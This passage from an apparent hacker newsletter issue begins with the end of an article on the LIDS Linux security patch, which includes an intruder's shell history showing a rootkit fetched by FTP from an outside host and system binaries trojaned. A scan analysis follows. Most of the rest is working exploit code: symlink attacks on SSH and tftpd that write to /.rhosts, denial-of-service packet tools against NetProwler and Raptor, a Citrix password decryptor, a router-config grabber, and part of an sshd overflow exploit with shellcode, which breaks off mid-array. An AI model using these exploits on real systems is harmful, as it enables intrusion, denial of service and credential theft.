You will also note that on shutdown, most of the shutdown scripts will fail. This is normal. The final shutdown script (/etc/rc.d/init.d/halt) will kill all of the processes and unmount the file systems. No other process will be allowed to
kill any of the children of the init() process, due to the "+INIT_CHILDREN_LOCK" protection made in the rc.local file (above).
Also, every 10 minutes, you will get an error message about "rmmod \as" being unable to remove a module. This is because the "-CAP_SYS_MODULE" protection stops insertion or removal of modules once LIDS has started. To
stop the error message happening, delete the /etc/cron.d/kmod file.
What Can LIDS Protect?
A quick read through the LIDS documentation will reveal the full set of features in LIDS. The most important features, in my opinion, include the following:
CAP_LINUX_IMMUTABLE, which protects the files and file systems from being written to when marked "immutable".
CAP_NET_ADMIN, which prevents tampering with the network configuration (eg: prevents route table entries from being changed, and prevents firewall entries from being tampered with).
CAP_SYS_MODULE which prevents insertion and removal of kernel modules.
CAP_SYS_RAWIO which prevents raw disk/device I/O.
CAP_SYS_ADMIN which prevents a large range of other system administration functions.
INIT_CHILDREN_LOCK which prevents child processes of the init() master process from being tampered with.
All of the above features can be turned on at any point using "lidsadm -I". The features can also be disabled at any point (to allow the real system administrator access to the system configuration) by using "lidsadm -S", and
providing the LIDS password which was installed into the kernel (and encrypted with RipeMD-160).
Anatomy of a Break In
I was recently asked to examine a system that had been hacked, to determine the cause of the break-in, and to determine what damage the hacker had done to the system. Fortunately, the system was hacked by someone who
was not particularly clever, and didn't manage to conceal their tracks entirely.
The break-in occurred when the hacker overflowed the buffer of a system daemon running as root (in fact one that should not have been running on the system at all, but the person who installed Linux was careless and left it
running, and also failed to install Red Hat's released updates which would have fixed the buffer overflow problem). The hacker, however, was also careless in that when they managed to open a shell (BASH) on the hacked system
following the break-in, they forgot that the BASH shell logs all activity to a .bash_history file for use by the command line recall functions. A simple read through /.bash_history revealed exactly what the hacker had done while
logged on to the system.
The file read as follows (edited slightly for brevity):
mkdir /usr/lib/... ; cd /usr/lib/...
ftp 200.192.58.201 21
cd /usr/lib/...
mv netstat.gz? netstat.gz; mv ps.gz? ps.gz; mv pstree.gz? pstree.gz;
mv pt07.gz? pt07.gz; mv slice2.gz? slice2.gz; mv syslogd.gz? syslogd.gz;
mv tcpd.gz? tcpd.gz
gzip -d *
chmod +x *
mv netstat /bin ; mv ps /bin ; mv tcpd /usr/sbin/; mv syslogd /usr/sbin;
mv pt07 /usr/lib/; mv pstree /usr/bin ;
/usr/lib/pt07
touch -t 199910122110 /usr/lib/pt07
touch -t 199910122110 /usr/sbin/syslogd
touch -t 199910122110 /usr/sbin/tcpd
touch -t 199910122110 /bin/ps
touch -t 199910122110 /bin/netstat
touch -t 199910122110 /usr/bin/pstree
cat /etc/inetd.conf | grep -v 15678 >> /tmp/b
mv /tmp/b /etc/inetd.conf
killall -HUP inetd
Reading through this file, we can note the following activity:
A directory with an unusual name (/usr/lib/...) was created on the system. An FTP connection was made back to the hacker's personal machine (200.192.58.201, traced to a dial-in address somewhere in Brazil), and a
simple hacker-kit was downloaded.
The hacker kit was uncompressed. It contained trojan binaries which were then installed on the system.
The trojan binaries were used to over-write the system versions of netstat, ps, tcpd, syslogd, and pstree. These are programs that get used to report on system activity, show running processes, show open ports, etc.
A backdoor process of some kind (/usr/lib/pt07) was installed and started. Note that since the hacker has installed his or her own versions of ps, pstree, and netstat, this trojan is probably invisible to the system.
What Can We Learn From This?
Firstly, note that LIDS would not have prevented the actual break-in. The hacker obtained root access to the machine by connecting to and overflowing a buffer in a process that was running as root.
Once the hacker had broken in, we can note how LIDS would have minimised the damage:
LIDS, by using the CAP_LINUX_IMMUTABLE option, would have prevented the trojan binaries from being written to /bin, /usr/bin, /usr/sbin, and /usr/lib. These are directories that we would normally mark as immutable (chattr
+i) and hence could not have been changed. Note that even without LIDS we can mark these directories as immutable using chattr +i, but LIDS prevents even the root user from tampering with the immutable flag.
Similarly, the touch -t commands would have failed if the files were marked chattr +i.
Even the very first line of the script, "mkdir /usr/lib/..." would have failed if the /usr/lib directory was marked immutable!
Note that LIDS would not have prevented the break-in, but would have prevented the hacker from causing any significant system damage after the break-in. A backdoor process could have been installed (eg: the pt07 backdoor
could have been placed in /tmp, or any other non-immutable directory), but the non-trojan versions of ps, netstat, and pstree would have detected this process fairly easily and we could have come back and killed it off.
Without LIDS being installed we have no other real clues as to what the hacker might have done via this backdoor, and so our only available method to clean up the hacker's damage is to re-install the system completely.
OpenWall and LIDS: An Extra Layer
Another similar system to LIDS is the OpenWall project (http://www.openwall.com/linux/). The OpenWall project contains some different security features to LIDS, and one of the OpenWall patches in particular makes the stack area
non-executable. An excerpt from the OpenWall README file states:
Most buffer overflow exploits are based on overwriting a function's return address on the stack to point to some arbitrary code, which is also put onto the stack. If the stack area is non-executable, buffer overflow
vulnerabilities become harder to exploit.
Another way to exploit a buffer overflow is to point the return address to a function in libc, usually system(). This patch also changes the default address that shared libraries are mmap()'ed at to make it always contain
a zero byte. This makes it impossible to specify any more data (parameters to the function, or more copies of the return address when filling with a pattern), -- in many exploits that have to do with ASCIIZ strings.
Recently, the LIDS web site has contained some integrated LIDS + OpenWall kernel patches that apply the security features of both LIDS and OpenWall to the kernel in a single integrated patch set.
Conclusions
Using a set of layered security tools on the Linux system, it is possible to prevent a wide range of system attacks, and to protect your system against intrusion or tampering. A hacker's point of entry into your system will be the
network interfaces, and protecting these, and under the network interfaces, the system kernel, can discourage many attacks and prevent others.
Be aware of any potential security holes in your system. Any daemon or service running on your system, either as root or as a non-root user, can be a potential security threat. Be prepared to face attacks against these threats.
David Elson (Del) is a security and technology consultant working for Wang New Zealand in Christchurch, on the South Island of New Zealand. With 15 years IT experience, he consults to various clients on security and networking issues. He also maintains a set of web pages on Linux and other related
security topics, and has given talks on various security and networking issues at conferences in Australia and New Zealand.
@HWA
232.0 [IND] scan.txt Spitzner gets an unusual scan.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Recently my network received an unusual scan, deciphering
it has proven difficult. With some outstanding help
from the security community, here is my best guess at
what the scan is.
THE SCAN
--------
On 20 May, one of my systems received a unique scan from
three systems. The three systems are:
jive.rahul.net (192.160.13.4)
bug.rahul.net (192.160.13.7)
foxtrot.rahul.net (192.160.13.6)
The scan signature is exactly the same from all three systems,
they scanned ports 1-1024 (see signature below). Of these
three systems, one is not active (jive.rahul.net) so we
know for certain that at least one system was spoofed. The
other two systems (bug and foxtrot) are up. This was confirmed
both by hping and by the system owner, Rahul Dhesi <dhesi@rahul.net>
However, I do not know if the two live systems were spoofed or not.
--- snort snort ---
05/20-17:06:45.061034 192.160.13.4:31337 -> 172.16.1.101:1
TCP TTL:44 TOS:0x10 ID:242
***FRP** Seq: 0xA1D95 Ack: 0x53 Win: 0x400
.
.
.
05/20-17:06:58.685879 192.160.13.4:31337 -> 172.16.1.101:1024
TCP TTL:44 TOS:0x10 ID:242
***FRP** Seq: 0xA1D95 Ack: 0x53 Win: 0x400
--- snip snip ---
THE TOOL
--------
These packets were crafted by a tool, they were not created by
a standard IP stack. We can determine this based on the following:
1. The Seq, Ack, and IP ID numbers are the same for all 1024 packets.
An IP stack would have increasing numbers for all three.
2. Note the TCP flags, FIN, RST, and PSH. No standard IP stack would
produce such a packet, nor would any IP stack respond with such a packet.
Many people commented that this was Back Orrifice because the 31337 port,
but that is not the case. First, BO uses UDP by default. Also, Dildog had
this to say about the scan:
"A bo2k scanner would never come -from- port 31337. Something might scan
-you- for sockets listening on 31337, but not the other way around.
Regardless, this would have been BO, not BO2K, since BO2K doesn't have
a default port. This just looks like a regular port scan to me with a
fixed local port."
So, this scan was most likely done by a scanner that creates its own packets,
but which one?
Not nmap: Nmap does not have a FRP flag option. Nor does it use constant
Seq, Ack, and IP ID numbers.
Not hping: Hping can set most of the functionality of this scan, but it CANNOT
set the Seq or Ack number.
The best guess we have among the security community is these signatures were
created by Libnet, some one has created their own packets. Why Libnet?
To qoute Simple Nomad (and Aaron Campbell)
"I thought these values looked familar. Took me a bit, but check out the
sample programs that come with Libnet. In there you will find id 242, seq
a1d95, ack 53, and a ttl of 48. Looks like someone was playing around
trying to write a scanner of sorts using the Libnet sample progs as a
starting point, and scanned you. So check every machine 4 hops away...."
NOTE: I tried the traceroute 4 hops out, it was a router, most likely not
our suspect :(
So, based on what we know, our best guess is that Libnet was used to create
these packets.
PURPOSE OF THE SCAN
-------------------
This is the most confusing part, the TCP Flags FRP do not generate a response,
from open or closed ports. This has been tested on a variety of systems by
a several people, inlcuding Max Vision, Dennis Ducamp, and myself. So
why run a scan when you won't get any results? I do not know. Maybe
someone was testing their coding or scanning skills. Perhaps they were
trying "man-in-the-middle" scan techniques. We may never know :(
K2 from ADM CREW has an interesting theory
"Well, not really, what if your not using the TCP/IP stack of the OS but rather
something like libpcap backdoor and are looking for weirdo options ( this will
enable you to communicate through onto a firewall'd system )... he dose use
libnet to communicate with it so it lead's me to believe that he wants to have a
sub-carrier connection that is not normally valid. Source port significance is
a really good way to authenticate to a backdoor (ip independent), and can be
detected by the trojan early (able to bypass system logging).
Exactally, libpcap based backdoor with a libnet based client to pipe i/o to the
backdoor... I dont know why they would scan all the ports other then to assume
that the backdoor on the host may modulate the port it's listening on... also, a
system like this could listen on a port already allocated by the system like
even if telnetd is running... you can still contact your backdoor on port 23
because your connect to that port is not valid to anything that the system would
have there (your basically going up your libpcap stack insted of the OS), this
also helps get past any host firewall."
A comment from the system owner Rahul Dhesi, who has been extremely
helpful with this analysis.
"Hi, I don't see any obvious signs of a break-in on bug.rahul.net
or foxtrot.rahul.net. Also, they are running different OSs:
foxtrot is SunOS 4.1.3_U1, while bug is FreeBSD 3.4-STABLE.
It seems doubtful to me that somebody would break into two machines
running different OSs at around the same time. if somebody really
broke into one of them, he would likely attack other machines
on the network running the same OS. So I'm guessing that all
packets were spoofed."
Side note, FRP packets are not entered in the state table for FW-1
firewall. Even though the packet may be accepted and logged, the packet
would not enter the FW-1 state table.
ADDENDUM
--------
If you have any comments or words of wisdom you would like to add, please
email me at Lance Spitzner <lance@spitzner.net>. Also, I have posted the
raw data (tcpdump/snort binary format>. You can download it at
http://www.enteract.com/~lspitz/scan.gz
Thanks to the following people for their help and ideas:
Nelson Murilo <nelson@pangeia.com.br>
Bill Pennington <billp@rocketcash.com>
Aaron Campbell <aaron@cs.dal.ca>
Denis Ducamp <Denis.Ducamp@hsc.fr>
Simple Nomad <thegnome@nmrc.org>
K2 ADM CREW
... and the many others who sent their ideas
@HWA
233.0 [IND] local ssh 1.2.27 dos attack.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.hack.co.za/daem0n/ssh/socket-dos.pl
#!/usr/bin/perl
#
# vulnerable: SSH 1.2.27
#
# A vulnerability in SSH's creation of the authentication
# agent UNIX domain socket allows local users to create a
# UNIX domain socket with an arbitrary file name in the
# system.
#
# SSH has the concept of authentication proxying via the
# SSH authentication agent. It allows for a basic kind of
# Single Sign-On capability. The sshd daemon, ssh and ssh
# -agent communicate via a UNIX domain socket normally of
# the form '/tmp/ssh-<username>/agent-socket-<pid>'.
#
# SSH follows symbolic links while creating the socket as
# root thus allowing any local users with ssh access to
# create a socket with an arbitrary filename in the
# system.
#
# Notice that this will not work under all operating
# systems. Some operating systems do not follow symbolic
# links during bind on UNIX domain sockets. Linux 2.0.x,
# Solaris 2.5.1 and IRIX 6.5.2 do not follow symbolic
# links during bind(2). Linux 2.1.x does.
$pid = $;
$whoami = `whoami`;
chop($whoami);
mkdir("/tmp/ssh-$whoami", 0700);
for ($i = $pid; $i < $pid+50; $i++)
{
symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent");
}
# www.hack.co.za [23 May]#
@HWA
234.0 [IND] ascend router remote exploit by loneguard.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.hack.co.za/os/routers/ascend/tftp.sh
#!/bin/sh
#
# tftpserv.sh - Loneguard 07/03/99
#
# Buggy tftp server shipped with CascadeView B-STDX 8000/9000
#
# The tftpd bundled with CascadeView for Ascend's B-STDX 8000/9000
# network devices creates a log in /tmp called tftpd_xfer_status.log.
#
# If /tmp/tftpd_xfer_status.log already exists as a symbolic link,
# tftpd will follow it and overwrite any data it points to (it runs
# as root). It is possible for an attacker to link the log file to a
# file like /.rhosts to compromise elevated privileges on the device.
#
# It should be made clear that since this is a network device
# vulnerability, the consequences of compromise could be much greater
# to the network the device is on as a whole than if it were a single
# regular host.
rm /tmp/tftpd_xfer_status.log
ln -s /.rhosts /tmp/tftpd_xfer_status.log
echo KungFu > crazymonkey
( sleep 1 ; echo put crazymonkey ; sleep 1 ; echo quit ) | tftp 127.1
echo "+ +" > /.rhosts
# www.hack.co.za [23 May]#
@HWA
235.0 [IND] ascend router remote dos exploit by rfp.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
rfp@wiretrip.net
http://www.hack.co.za/os/routers/axent/RFProwl.c
/* RFProwl.c - rain forest puppy / wiretrip / rfp@wiretrip.net
Kills NetProwler IDS version 3.0
You need libnet installed. It's available from
www.packetfactory.net. Acks to route.
Only tested on RH 6.x Linux. To compile:
gcc RFProwl.c -lnet -o RFProwl
Plus, make sure your architecture is defined below:
Axent NetProwler 3.0
*/
#define LIBNET_LIL_ENDIAN 1
#undef LIBNET_BIG_ENDIAN 1
#include <libnet.h>
/* it's just much easier to code in the packet frags we want. :) */
char pack1[]="\x45\x00"
"\x00\x24\x08\xb9\x00\x03\x3e\x06\x96\xf8\x0a\x09\x65\x0d\x0a\x09"
"\x64\x01\x04\x02\x08\x0a\x00\x26\xcd\x35\x00\x00\x00\x00\x01\x02"
"\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
char pack2[]="\x45\x00"
"\x00\x2c\x08\xbf\x20\x00\x3e\x06\x76\xed\x0a\x09\x65\x0d\x0a\x09"
"\x64\x01\x04\x08\x00\x15\xa7\xe4\x00\x48\x00\x00\x00\x00\xa0\x02"
"\x7d\x78\x72\x9d\x00\x00\x02\x04\x05\xb4\x00\x00";
int main(int argc, char **argv) {
int sock, c;
u_long src_ip, dst_ip;
printf("RFProwl - rain forest puppy / wiretrip\n");
if(argc<3){
printf("Usage: RFProwl <profiled IP/destination> <src IP(fake)>\n");
exit(EXIT_FAILURE);}
dst_ip=inet_addr(argv[1]);
src_ip=inet_addr(argv[2]);
memcpy(pack1+16,&dst_ip,4);
memcpy(pack2+16,&dst_ip,4);
memcpy(pack1+12,&src_ip,4);
memcpy(pack1+12,&src_ip,4);
sock = open_raw_sock(IPPROTO_RAW);
if (sock == -1){
perror("Socket problems: ");
exit(EXIT_FAILURE);}
c = write_ip(sock, pack1, 46);
if (c < 46) printf("Write_ip #1 choked\n");
c = write_ip(sock, pack2, 46);
if (c < 46) printf("Write_ip #2 choked\n");
printf("Packets sent\n");
return (c == -1 ? EXIT_FAILURE : EXIT_SUCCESS);
}
/* www.hack.co.za [23 May]*/
@HWA
236.0 [IND] citrix router local exploit by dug song.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.hack.co.za/os/routers/citrix/icadecrypt.c
http://www.monkey.org/%7Edugsong/
/*
icadecrypt.c
Decrypt stored Citrix ICA passwords (in appsrv.ini).
vulnerable Citrix MetaFrame for Unix 1.0
- Sun Solaris 8.0
- Sun Solaris 7.0
Citrix MetaFrame for Windows 2000 1.8 and previous
- Microsoft Windows NT 2000
Citrix MetaFrame for Windows NT 4.0 TSE 1.8 and previous
- Microsoft Windows NT Terminal Server
+ Microsoft Windows NT 4.0
Citrix WinFrame for Windows NT 3.5 1.8
- Microsoft Windows NT 3.5.1
Dug Song <dugsong@monkey.org>
*/
#include <sys/types.h>
#include <netinet/in.h>
#include <stdio.h>
#include <string.h>
#include <ctype.h>
int
hex_decode(char *src, u_char *dst, int outsize)
{
char *p, *pe;
u_char *q, *qe, ch, cl;
pe = src + strlen(src);
qe = dst + outsize;
for (p = src, q = dst; p < pe && q < qe && isxdigit((int)*p); p += 2) {
ch = tolower(p[0]);
cl = tolower(p[1]);
if ((ch >= '0') && (ch <= '9')) ch -= '0';
else if ((ch >= 'a') && (ch <= 'f')) ch -= 'a' - 10;
else return (-1);
if ((cl >= '0') && (cl <= '9')) cl -= '0';
else if ((cl >= 'a') && (cl <= 'f')) cl -= 'a' - 10;
else return (-1);
*q++ = (ch << 4) | cl;
}
return (q - dst);
}
int
ica_decrypt(u_char *pass, int len)
{
u_short i;
u_char *p, key;
if (len < 4)
return (0);
i = ntohs(*(u_short *)pass);
if (i != len - 2)
return (0);
key = pass[2];
p = pass + 3;
for (i -= 2; i > 0; i--)
p[i] = p[i - 1] ^ p[i] ^ key;
p[0] ^= (key | 'C');
i = len - 3;
memmove(pass, pass + 3, i);
pass[i] = '\0';
return (1);
}
void
usage(void)
{
fprintf(stderr, "Usage: icadecrypt <file>\n");
exit(1);
}
int
main(int argc, char *argv[])
{
FILE *f;
u_char line[1024], pass[128];
int len;
if (argc != 2 || *argv[1] == '-')
usage();
if ((f = fopen(argv[1], "r")) == NULL) {
perror("fopen");
exit(1);
}
while (fgets(line, sizeof(line), f) != NULL) {
if (strncmp(line, "Password=", 9) == 0) {
len = hex_decode(line + 9, pass, sizeof(pass));
if (ica_decrypt(pass, len))
printf("; icadecrypt: [%s]\n", pass);
}
printf("%s", line);
}
fclose(f);
exit(0);
}
/* 5000. */
/* www.hack.co.za [23 May]*/
@HWA
237.0 [IND] ascend router remote dos attack by msg.net.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.hack.co.za/os/routers/axent/raptor.c
/*
* 10.26.1999
* Axent Raptor 6.0 'IP Options DOS' as documented in BugTraq 10.20.1999
*
* Proof of Concept by MSG.Net, Inc.
*
* Tested on Intel/*BSD systems, your mileage may vary. No warranty.
* Free to distribute as long as these comments remain intact.
*
* Exercises the IP options bug reported in Raptor 6.0, this bug is fixed by
* an Axent official patch available at:
*
* ftp://ftp.raptor.com/patches/V6.0/6.02Patch/
*
*
* The MSG.Net Firewall Wrecking Crew
*
* [kadokev, l^3, strange, vn]
*
* Quid custodiet ipsos custodes?
*/
#define __FAVOR_BSD
#include <unistd.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#define SRC_IP htonl(0x0a000001) /* 10.00.00.01 */
#define TCP_SZ 20
#define IP_SZ 20
#define PAYLOAD_LEN 32
#define OPTSIZE 4
#define LEN (IP_SZ + TCP_SZ + PAYLOAD_LEN + OPTSIZE)
void main(int argc, char *argv[])
{
int checksum(unsigned short *, int);
int raw_socket(void);
int write_raw(int, unsigned char *, int);
unsigned long option = htonl(0x44000001); /* Timestamp, NOP, END */
unsigned char *p;
int s, c;
struct ip *ip;
struct tcphdr *tcp;
if (argc != 2) {
printf("Quid custodiet ipsos custodes?\n");
printf("Usage: %s <destination IP>\n", argv[0]);
return;
}
p = malloc(1500);
memset(p, 0x00, 1500);
if ((s = raw_socket()) < 0)
return perror("socket");
ip = (struct ip *) p;
ip->ip_v = 0x4;
ip->ip_hl = 0x5 + (OPTSIZE / 4);
ip->ip_tos = 0x32;
ip->ip_len = htons(LEN);
ip->ip_id = htons(0xbeef);
ip->ip_off = 0x0;
ip->ip_ttl = 0xff;
ip->ip_p = IPPROTO_TCP;
ip->ip_sum = 0;
ip->ip_src.s_addr = SRC_IP;
ip->ip_dst.s_addr = inet_addr(argv[1]);
/* Masquerade the packet as part of a legitimate answer */
tcp = (struct tcphdr *) (p + IP_SZ + OPTSIZE);
tcp->th_sport = htons(80);
tcp->th_dport = 0xbeef;
tcp->th_seq = 0x12345678;
tcp->th_ack = 0x87654321;
tcp->th_off = 5;
tcp->th_flags = TH_ACK | TH_PUSH;
tcp->th_win = htons(8192);
tcp->th_sum = 0;
/* Set the IP options */
memcpy((void *) (p + IP_SZ), (void *) &option, OPTSIZE);
c = checksum((unsigned short *) &(ip->ip_src), 8)
+ checksum((unsigned short *) tcp, TCP_SZ + PAYLOAD_LEN)
+ ntohs(IPPROTO_TCP + TCP_SZ);
while (c >> 16) c = (c & 0xffff) + (c >> 16);
tcp->th_sum = ~c;
printf("Sending %s -> ", inet_ntoa(ip->ip_src));
printf("%s\n", inet_ntoa(ip->ip_dst));
if (write_raw(s, p, LEN) != LEN)
perror("sendto");
}
int write_raw(int s, unsigned char *p, int len)
{
struct ip *ip = (struct ip *) p;
struct tcphdr *tcp;
struct sockaddr_in sin;
tcp = (struct tcphdr *) (ip + ip->ip_hl * 4);
memset(&sin, 0x00, sizeof(sin));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = ip->ip_dst.s_addr;
sin.sin_port = tcp->th_sport;
return (sendto(s, p, len, 0, (struct sockaddr *) &sin,
sizeof(struct sockaddr_in)));
}
int raw_socket(void)
{
int s, o = 1;
if ((s = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
return -1;
if (setsockopt(s, IPPROTO_IP, IP_HDRINCL, (void *) &o, sizeof(o)) < 0)
return (-1);
return (s);
}
int checksum(unsigned short *c, int len)
{
int sum = 0;
int left = len;
while (left > 1) {
sum += *c++;
left -= 2;
}
if (left)
sum += *c & 0xff;
return (sum);
}
/*###EOF####*/
/* www.hack.co.za [24 May]*/
@HWA
238.0 [IND] cisco/ascend router remote exploit. posted by mixter.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.hack.co.za/os/routers/cisco/grabrtrconf.sh
#!/bin/sh
# grabrtrconf:
# Pull router configs via tftp for cisco's and ascends. obviously trivial to
# modify this for other network hardware that supports this type of thing.
#
# - [type] can be one of cisco | ascend currently
# - defaults to cisco
# - requires cmu snmp utilities (snmpset specifically)
# - use TFTPLISTEN and disable tftp from /etc/inetd.conf if you want to
# launch a 'temporary' in.tftpd just to grab the file.
# - 'pidof' only exists on linux that I know of which kindof makes this a
# linux-only tool, unless/until I decide to stop relying on it.
# - Set 'INT' to whatever your routable IP is.
# - run as root (if you want to launch the tftp server)
#
# - I know this is lame... but it works (most of the time).
#
# by: Eric Monti 11/1997
#
TFTPLISTEN="true"
DIR=/tftpboot #might want to use something else
WAIT=6
INT=ppp0
test "$4" = "" && echo "Usage: `basename $0` target write-community tftphost filename [type]" && exit 1
TYPE=$5
test "$5" = "" && TYPE="cisco"
IPADDR=$3
test "$IPADDR" = "." && IPADDR=`/sbin/ifconfig $INT | grep inet | sed "s/\:/\ /" | awk '{print $3}'`
echo $3
if [ -n $TFTPLISTEN ];then
echo "tftp dgram udp wait root /usr/sbin/in.tftpd in.tftpd $DIR" > /tmp/ind.conf
/usr/sbin/inetd -d /tmp/ind.conf &
rm /tmp/ind.conf
rm -f $DIR/$4
touch $DIR/$4
chmod 666 $DIR/$4
fi
#CISCO get config
test "$TYPE" = "cisco" && \
snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.9.2.1.55.$IPADDR s $4
#ASCEND get config
if [ "$TYPE" = "ascend" ];then
snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.529.9.5.3.0 a $IPADDR
snmpset -r 3 -t 3 $1 $2 .1.3.6.1.4.1.529.9.5.4.0 s $4
snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.1.0 i 3
snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.3.0 a "0.0.0.0"
snmpset -r 3 $1 $2 .1.3.6.1.4.1.529.9.5.4.0 s ""
fi
sleep $WAIT
# i got lazy and used pidof... so what.
# I made pretty dots appear to make up for it!
if (test `pidof in.tftpd`);then
echo Receiving file:
while (test "`pidof in.tftpd`");do
echo -n .
sleep 1
done
echo
echo Transfer Complete
fi
if [ -n $TFTPLISTEN ];then
kill `cat /var/run/inetd.pid` # jeepers, i hope that wasnt the real1
fi
# www.hack.co.za [23 May]#
@HWA
239.0 [IND] remote ssh 1.2.27 remote overflow by Core SDI SA.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.hack.co.za/daem0n/ssh/sshd-rsaref2.diff
diff -N -c ssh-1.2.27/README.coresdi ssh-1.2.27-exploit/README.coresdi
*** ssh-1.2.27/README.coresdi Wed Dec 31 21:00:00 1969
--- ssh-1.2.27-exploit/README.coresdi Tue Dec 14 19:21:10 1999
***************
*** 0 ****
--- 1,32 ----
+ /*
+ *
+ * Descrition: Exploit code for SSH-1.2.27 sshd with rsaref2 compiled in
+ * (--with-rsaref)
+ *
+ * Author: Alberto Solino <Alberto_Solino@core-sdi.com>
+ *
+ * Copyright (c) 1999 CORE SDI S.A., Buenos Aires, Argentina.
+ * All rights reserved.
+ *
+ *
+ * THIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES
+ * ARE DISCLAIMED. IN NO EVENT SHALL CORE SDI S.A. BE LIABLE FOR ANY DIRECT,
+ * INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY OR CONSEQUENTIAL DAMAGES RESULTING
+ * FROM THE USE OR MISUSE OF THIS SOFTWARE.
+ *
+ */
+
+ Tested on
+ SSH-1.2.27 Linux RedHat 6.0
+ SSh-1.2.27 OpenBSD 2.6
+
+ Details
+ Relies on offsets taken from JUMP_TO_MY_KEY that are different on
+ different boxes.
+ If it doesnt work, check inside incoming.buf for the string "BETO"
+ and find the proper offsets from there.
+ Additionally, the -f nad -t options are available, to provide
+ a range of addresses and try to brute force remotely the right
+ one.
+ Specify the target os type with -o
+
Binary files ssh-1.2.27/exploit_key and ssh-1.2.27-exploit/exploit_key differ
diff -N -c ssh-1.2.27/exploit_key.pub ssh-1.2.27-exploit/exploit_key.pub
*** ssh-1.2.27/exploit_key.pub Wed Dec 31 21:00:00 1969
--- ssh-1.2.27-exploit/exploit_key.pub Tue Nov 30 01:14:10 1999
***************
*** 0 ****
--- 1 ----
+ 1024 35 126711790959034717449904354103174105464423905750911738400315407900752946071988773532672356922306687685191424606806952947660867911760697942514594956213990584856991678398353026692681430136274853402829183803383791361598788187120276305630837366787507026341329913385926890796258293060370046555624537870005279144741 root@jack
Common subdirectories: ssh-1.2.27/gmp-2.0.2-ssh-2 and ssh-1.2.27-exploit/gmp-2.0.2-ssh-2
diff -N -c ssh-1.2.27/history ssh-1.2.27-exploit/history
*** ssh-1.2.27/history Wed Dec 31 21:00:00 1969
--- ssh-1.2.27-exploit/history Tue Nov 16 21:41:36 1999
***************
*** 0 ****
--- 1,7 ----
+ Tue Nov 16 19:58:04 ART 1999
+ En RSAPrivateBlock, no calcula la longitud de salida del buffer, simplemente copia
+ el tamanio del modulo que esta en privatekey, pero la longitud de los numeros
+ nunca es mayor que 128.
+ Tue Nov 16 21:41:15 ART 1999
+ overflow en RSAPrivateDecrypt????!?!?!??!?!?! who knows!! fijarse...
+
Common subdirectories: ssh-1.2.27/rsaref2 and ssh-1.2.27-exploit/rsaref2
diff -N -c ssh-1.2.27/ssh.c ssh-1.2.27-exploit/ssh.c
*** ssh-1.2.27/ssh.c Wed May 12 08:19:28 1999
--- ssh-1.2.27-exploit/ssh.c Tue Dec 14 19:03:59 1999
***************
*** 202,208 ****
#include "readconf.h"
#include "userfile.h"
#include "emulate.h"
-
#ifdef LIBWRAP
#include <tcpd.h>
#include <syslog.h>
--- 202,207 ----
***************
*** 212,217 ****
--- 211,249 ----
int allow_severity = LOG_INFO;
int deny_severity = LOG_WARNING;
#endif /* LIBWRAP */
+ #ifdef SSH_EXPLOIT
+ #define BETO_STR 0x80850f8
+ unsigned long exp_offset=BETO_STR;
+ unsigned long exp_offset_to=BETO_STR;
+ unsigned char *shell_code;
+ unsigned long shell_code_len=0;
+ unsigned char linux_shell_code[]=
+ {0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90 ,0x90
+ ,0xeb ,0x44 ,0x5e ,0x89 ,0x76
+ ,0x08 ,0x31 ,0xc0 ,0x88 ,0x46 ,0x07 ,0x89 ,0x46
+ ,0x0c ,0x56 ,0xb9 ,0x00 ,0x00 ,0x00 ,0x00 ,0xbb
+ ,0x05 ,0x00 ,0x00 ,0x00 ,0xb0 ,0x3f ,0xcd ,0x80
+ ,0xb9 ,0x01 ,0x00 ,0x00 ,0x00 ,0xbb ,0x05 ,0x00
+ ,0x00 ,0x00 ,0xb0 ,0x3f ,0xcd ,0x80 ,0xb9 ,0x02
+ ,0x00 ,0x00 ,0x00 ,0xbb ,0x05 ,0x00 ,0x00 ,0x00
+ ,0xb0 ,0x3f ,0xcd ,0x80 ,0x5e ,0xb0 ,0x0b ,0x89
+ ,0xf3 ,0x8d ,0x4e ,0x08 ,0x8d ,0x56 ,0x0c ,0xcd
+ ,0x80 ,0xe8 ,0xb7 ,0xff ,0xff ,0xff ,0x2f ,0x62
+ ,0x69 ,0x6e ,0x2f ,0x73 ,0x68 ,0x00};
+ unsigned char bsd_shell_code[]=
+ {0x90, 0x90, 0x90, 0x90, 0x90, 0x90, 0x90,
+ 0xeb, 0x45, 0x5e, 0x89, 0x76, 0x08, 0x31, 0xc0,
+ 0x88, 0x46, 0x07, 0x89, 0x46, 0x0c, 0x6a, 0x00,
+ 0x6a, 0x05, 0x51, 0xb8, 0x5a, 0x00, 0x00, 0x00,
+ 0xcd, 0x80, 0x6a, 0x01, 0x6a, 0x05, 0x51, 0xb8,
+ 0x5a, 0x00, 0x00, 0x00, 0xcd, 0x80, 0x6a, 0x02,
+ 0x6a, 0x05, 0x51, 0xb8, 0x5a, 0x00, 0x00, 0x00,
